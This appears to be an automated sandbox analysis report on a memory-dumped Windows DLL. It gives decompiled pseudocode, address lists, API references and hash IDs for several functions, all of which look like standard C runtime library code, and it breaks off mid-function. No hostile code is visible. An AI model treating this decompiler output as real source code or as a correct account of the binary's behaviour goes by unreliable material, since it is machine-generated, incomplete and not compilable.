0x6e1cf1e1
0x6e1cf1e5
0x6e1cf1f2
0x6e1cf1fa
0x6e1cf1fc
0x00000000
0x6e1cf1fc
0x6e1cf1c3
0x6e1cf1c3
0x00000000
0x6e1cf1c3
0x6e1cf1c1

APIs

__EH_prolog3.LIBCMT ref: 6E1CF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF194
int.LIBCPMT ref: 6E1CF1AB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF1CE
std::_Facet_Register.LIBCPMT ref: 6E1CF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF223

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: b907541997d5f26931a2e23dc5df2962eac46702d50761f9d70ed5d485b8e475
Instruction ID: 17cbc553947f46873d4d38657ca77728b4933f696d168cab1bf453b347714afc
Opcode Fuzzy Hash: b907541997d5f26931a2e23dc5df2962eac46702d50761f9d70ed5d485b8e475
Instruction Fuzzy Hash: 1F11E7799105198BCB01DBD4C854AFEB77AAFA4B14F244809E530AB290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E21621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e28506c; // 0x9881d723
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6E206BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6E1DF8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6E1CDEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6E214640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6E1CDEE1(_t100);
									goto L36;
								}
								_t62 = E6E214640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6E1CDEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6E20F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6E1E01B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6E214640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E20F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E1E01B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6e216224
0x6e216225
0x6e216226
0x6e21622d
0x6e216232
0x6e216238
0x6e21623e
0x6e216244
0x6e216247
0x6e216247
0x6e21624a
0x6e21624c
0x6e21624c
0x6e21624a
0x6e21624e
0x6e216253
0x6e21625a
0x6e21625d
0x6e21625d
0x6e216279
0x6e21627f
0x6e216284
0x6e216417
0x6e21641b
0x6e21642a
0x6e21628a
0x6e21628a
0x6e21628d
0x6e216292
0x6e216296
0x6e2162ea
0x6e2162ea
0x6e2162ec
0x6e2162ee
0x6e21640c
0x6e21640c
0x6e21640e
0x6e21640f
0x00000000
0x6e216415
0x6e2162ff
0x6e216305
0x6e216307
0x00000000
0x00000000
0x6e21630d
0x6e21631f
0x6e216324
0x6e216328
0x00000000
0x00000000
0x6e216335
0x6e21636f
0x6e216372
0x6e216375
0x6e216377
0x6e216379
0x6e21637b
0x6e2163c7
0x6e2163c7
0x6e2163c9
0x6e2163c9
0x6e2163cb
0x6e216405
0x6e216406
0x00000000
0x6e21640b
0x6e2163df
0x6e2163e4
0x6e2163e6
0x00000000
0x00000000
0x6e2163ea
0x6e2163eb
0x6e2163ec
0x6e2163ef
0x6e21642b
0x6e21642e
0x6e2163f1
0x6e2163f1
0x6e2163f2
0x6e2163f2
0x6e2163ff
0x6e216401
0x6e216403
0x6e216434
0x00000000
0x00000000
0x00000000
0x00000000
0x6e216403
0x6e21637d
0x6e216380
0x6e216382
0x6e216384
0x6e216386
0x6e216389
0x6e21638e
0x6e2163a9
0x6e2163ab
0x6e2163b5
0x6e2163b7
0x6e2163b8
0x6e2163ba
0x00000000
0x00000000
0x6e2163bc
0x6e2163c2
0x6e2163c2
0x00000000
0x6e2163c2
0x6e216390
0x6e216392
0x6e216396
0x6e21639b
0x6e21639d
0x6e21639f
0x00000000
0x00000000
0x6e2163a1
0x00000000
0x6e2163a1
0x6e216337
0x6e21633c
0x00000000
0x00000000
0x6e216342
0x6e216344
0x00000000
0x00000000
0x6e21635b
0x6e216360
0x6e216364
0x00000000
0x00000000
0x00000000
0x6e21636a
0x6e21629d
0x6e21629f
0x6e2162a1
0x6e2162a9
0x6e2162c8
0x6e2162ca
0x6e2162d4
0x6e2162d6
0x6e2162d7
0x6e2162d9
0x00000000
0x00000000
0x6e2162df
0x6e2162e5
0x6e2162e5
0x00000000
0x6e2162e5
0x6e2162ad
0x6e2162b1
0x6e2162b6
0x6e2162ba
0x00000000
0x00000000
0x6e2162c0
0x00000000
0x6e2162c0

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E1FF290,6E1FF290,?,?,?,6E216470,00000001,00000001,C5E85006), ref: 6E216279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E216470,00000001,00000001,C5E85006,?,?,?), ref: 6E2162FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2163F9
__freea.LIBCMT ref: 6E216406

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

__freea.LIBCMT ref: 6E21640F
__freea.LIBCMT ref: 6E216434

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 323c3f0b46da141275482b9cc833f38050f61a229ee2840e3ae1b3b9b275887e
Instruction ID: d17b67a0d4ae72e168519885af884913bf8c2d2ec0f161e1dbf85bf6c3583f73
Opcode Fuzzy Hash: 323c3f0b46da141275482b9cc833f38050f61a229ee2840e3ae1b3b9b275887e
Instruction Fuzzy Hash: 9A51B07262421BAFEB258EE4CC80EEF37EBEB44754F154629EE14D6140EB34DD918690

Uniqueness

Uniqueness Score: -1.00%

Function 6E2023DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6E2023DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6E214E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6E20C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6E20CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6E214E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6E20E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6E202188();
							asm("int3");
							E6E1E0990(_t97, _t123, 0x6e282bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6E2023DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6E20D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6E2150ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6E20F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6E2150ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6E202361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E20CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e2852ec & 0x00000001;
												if(( *0x6e2852ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6E20CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E2025CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6E20CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6E202188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6E1E09D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6E20E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

0x6e2023dd
0x6e2023dd
0x6e2023e2
0x6e2023e7
0x6e2023f7
0x6e2023f8
0x6e202401
0x6e202409
0x6e20240e
0x6e202411
0x6e202413
0x6e20241f
0x6e202429
0x6e20242c
0x6e20242d
0x6e20242f
0x6e202460
0x6e202461
0x6e202467
0x00000000
0x6e202431
0x6e20243b
0x6e202440
0x6e202443
0x6e202445
0x6e20245e
0x00000000
0x6e202447
0x6e202447
0x6e20244a
0x00000000
0x6e20244c
0x6e20244c
0x6e20244f
0x00000000
0x6e202451
0x00000000
0x6e202451
0x6e20244f
0x6e20244a
0x6e202445
0x6e202415
0x6e202415
0x6e202418
0x6e20246f
0x6e20246f
0x6e202470
0x6e202471
0x6e202472
0x6e202474
0x6e202479
0x6e202481
0x6e202489
0x6e20248d
0x6e202493
0x6e202494
0x6e202496
0x6e202498
0x6e2024a1
0x6e2024a6
0x6e2024ac
0x6e2024af
0x6e2024b2
0x6e2024b7
0x6e2024c6
0x6e2024cb
0x6e2024ce
0x6e2024d0
0x6e2024ea
0x6e2024f7
0x6e2024f9
0x6e2024fb
0x00000000
0x6e2024fd
0x6e2024fd
0x6e202500
0x6e202503
0x6e20250e
0x6e202511
0x6e202516
0x6e202519
0x6e20251b
0x6e20253e
0x6e20253e
0x6e202543
0x6e202548
0x6e202549
0x6e20254d
0x6e202553
0x6e202556
0x6e202558
0x6e20255c
0x6e202560
0x6e202566
0x6e20256b
0x6e20256c
0x6e202571
0x6e202571
0x6e202571
0x6e202560
0x6e202574
0x6e202577
0x6e20257e
0x6e202580
0x6e202587
0x6e20258d
0x6e20258f
0x6e202591
0x6e202595
0x6e202596
0x6e20259c
0x6e2025a2
0x6e2025a2
0x6e2025a2
0x6e2025a2
0x6e202596
0x6e20258f
0x6e202587
0x6e2025aa
0x6e2025ac
0x6e2025b3
0x6e2025b7
0x6e2025be
0x6e20251d
0x6e20251d
0x6e202520
0x6e202527
0x6e202527
0x6e202528
0x6e202529
0x6e20252a
0x6e20252b
0x00000000
0x6e202522
0x6e202522
0x6e202525
0x6e20252e
0x6e202530
0x00000000
0x6e202532
0x6e202533
0x00000000
0x6e202538
0x00000000
0x00000000
0x00000000
0x6e202525
0x6e202520
0x6e20251b
0x6e2024d2
0x6e2024d2
0x6e2024d5
0x6e2024dc
0x6e2024dc
0x6e2024dd
0x6e2024de
0x6e2024df
0x6e2024e0
0x6e2024e1
0x6e2024e1
0x6e2024d7
0x6e2024d7
0x6e2024da
0x00000000
0x00000000
0x6e2024da
0x6e2024e6
0x6e2024e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2024e8
0x6e20249a
0x6e20249a
0x6e20249a
0x6e2025ca
0x6e20241a
0x6e20241a
0x6e20241d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20241d
0x6e202418
0x6e2023e9
0x6e2023ee
0x6e20246b
0x6e20246e
0x6e20246e

APIs

__cftoe.LIBCMT ref: 6E202409
__cftoe.LIBCMT ref: 6E20243B

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 515c0086830cc9ab503ea2e67cf19b220532bb5b0565e6a54532559b1410e533
Instruction ID: a688100570c71f32e0c2eff8f943b1f216f983001335ed6e8de7adf0b9257da3
Opcode Fuzzy Hash: 515c0086830cc9ab503ea2e67cf19b220532bb5b0565e6a54532559b1410e533
Instruction Fuzzy Hash: A751E6B790420EABDB548BE88C51E9E77BFEF49335F20461BE825A71C2EF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E42C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E1E42C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6e285090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6E1E56A9(__eflags,  *0x6e285090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E1E56E4(__eflags,  *0x6e285090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6E1EB9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E1E56E4(__eflags,  *0x6e285090, 0);
								} else {
									__eflags = E6E1E56E4(__eflags,  *0x6e285090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E201DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e1e42cf
0x6e1e42e2
0x6e1e42e9
0x6e1e42ec
0x6e1e42ef
0x6e1e4308
0x6e1e4308
0x6e1e42f1
0x6e1e42f1
0x6e1e42f3
0x6e1e42fd
0x6e1e4303
0x6e1e4304
0x6e1e4306
0x6e1e430d
0x6e1e430f
0x6e1e4316
0x6e1e431a
0x6e1e431c
0x6e1e4330
0x6e1e4330
0x6e1e4339
0x6e1e431e
0x6e1e432c
0x6e1e432e
0x6e1e4342
0x6e1e4344
0x6e1e4344
0x00000000
0x00000000
0x00000000
0x6e1e432e
0x6e1e4347
0x00000000
0x00000000
0x00000000
0x6e1e4306
0x6e1e42f3
0x6e1e434f
0x6e1e4359
0x6e1e42d1
0x6e1e42d3
0x6e1e42d3

APIs

GetLastError.KERNEL32(00000001,?,6E1E3EDB,6E1DFA25,6E1DFD54,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E), ref: 6E1E42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1E42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1E42FD
SetLastError.KERNEL32(00000000,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1E434F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9691239de170a899e31a3bc37241588125ad9f2c2691b6410be3da5d0a13ab33
Instruction ID: d19f6520302ee1a8ae0207dc4aec2bba82585987b76f4bca51f2f1a016bf2b13
Opcode Fuzzy Hash: 9691239de170a899e31a3bc37241588125ad9f2c2691b6410be3da5d0a13ab33
Instruction Fuzzy Hash: FC01473221DF325FEB1406F56C99A8B26AAEB2737A330032AF02445CD4EF514886F190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CFA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t198 - 0x14, 0);
				_t189 =  *0x6e286dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1A161C(0x6e286da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E1C66BA(_t198 - 0x14);
					return E6E1E0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E1D14EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t198 - 0x20);
							E6E1E3D74(_t198 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t184, _t189, 0x14);
							E6E1C6653(_t198 - 0x14, 0);
							_t190 =  *0x6e286dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1A161C(0x6e286d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E1C66BA(_t198 - 0x14);
								return E6E1E0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E1D1558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t198 - 0x20);
										E6E1E3D74(_t198 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t141, _t185, _t190, 0x14);
										E6E1C6653(_t198 - 0x14, 0);
										_t191 =  *0x6e286e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1A161C(0x6e286dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E1C66BA(_t198 - 0x14);
											return E6E1E0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E1D15C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t198 - 0x20);
													E6E1E3D74(_t198 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t141, _t186, _t191, 0x14);
													E6E1C6653(_t198 - 0x14, 0);
													_t192 =  *0x6e286dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1A161C(0x6e286d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E1C66BA(_t198 - 0x14);
														return E6E1E0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E1D162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1A1438(_t169);
																E6E1E3D74(_t198 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e22851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e22c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E1D542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E1E0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E1C6FD3(__eflags, _t187);
																 *0x6e22a26c();
